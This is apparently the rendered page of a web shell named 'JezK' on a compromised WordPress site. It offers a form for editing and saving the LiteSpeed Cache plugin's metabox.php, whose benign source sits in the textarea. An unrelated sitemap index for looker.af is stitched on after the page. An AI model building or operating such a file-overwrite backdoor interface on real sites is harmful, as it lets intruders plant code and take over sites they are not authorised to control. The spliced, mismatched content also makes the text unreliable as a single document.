
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: metabox.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace LiteSpeed;

defined(&#039;WPINC&#039;) || exit();

wp_nonce_field(self::POST_NONCE_ACTION, Router::NONCE);

$post_id = get_the_ID();

foreach ($this-&gt;_postmeta_settings as $k =&gt; $v) {
	$existing_val = get_post_meta($post_id, $k, true);

	if (in_array($k, array(&#039;litespeed_vpi_list&#039;, &#039;litespeed_vpi_list_mobile&#039;))) {
		if (is_array($existing_val)) {
			$existing_val = implode(PHP_EOL, $existing_val);
		}
		echo &#039;&lt;div style=&quot;margin-bottom:10px;&quot;&gt;&lt;label for=&quot;&#039; . Str::trim_quotes($k) . &#039;&quot;&gt;&#039; . $v . &#039;&lt;/label&gt;&#039;;
		echo &#039;&lt;textarea style=&quot;width:100%&quot; rows=&quot;5&quot; id=&quot;&#039; . Str::trim_quotes($k) . &#039;&quot; name=&quot;&#039; . Str::trim_quotes($k) . &#039;&quot;&gt;&#039; . $existing_val . &#039;&lt;/textarea&gt;&#039;;
		echo &#039;&lt;/div&gt;&#039;;
	} else {
		echo &#039;&lt;div style=&quot;display:flex;margin-bottom:10px;align-items: center;gap: 2ch;justify-content: space-between;&quot;&gt;&lt;label for=&quot;&#039; . $k . &#039;&quot;&gt;&#039; . $v . &#039;&lt;/label&gt;&#039;;
		echo &#039;&lt;input class=&quot;litespeed-tiny-toggle&quot; id=&quot;&#039; .
			Str::trim_quotes($k) .
			&#039;&quot; name=&quot;&#039; .
			Str::trim_quotes($k) .
			&#039;&quot; type=&quot;checkbox&quot; value=&quot;1&quot; &#039; .
			($existing_val ? &#039;checked&#039; : &#039;&#039;) .
			&#039; /&gt;&#039;;
		echo &#039;&lt;/div&gt;&#039;;
	}
}

echo &#039;&lt;div style=&quot;text-align:right;&quot;&gt;&#039;;
Doc::learn_more(&#039;https://docs.litespeedtech.com/lscache/lscwp/metabox/&#039;);
echo &#039;&lt;/div&gt;&#039;;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
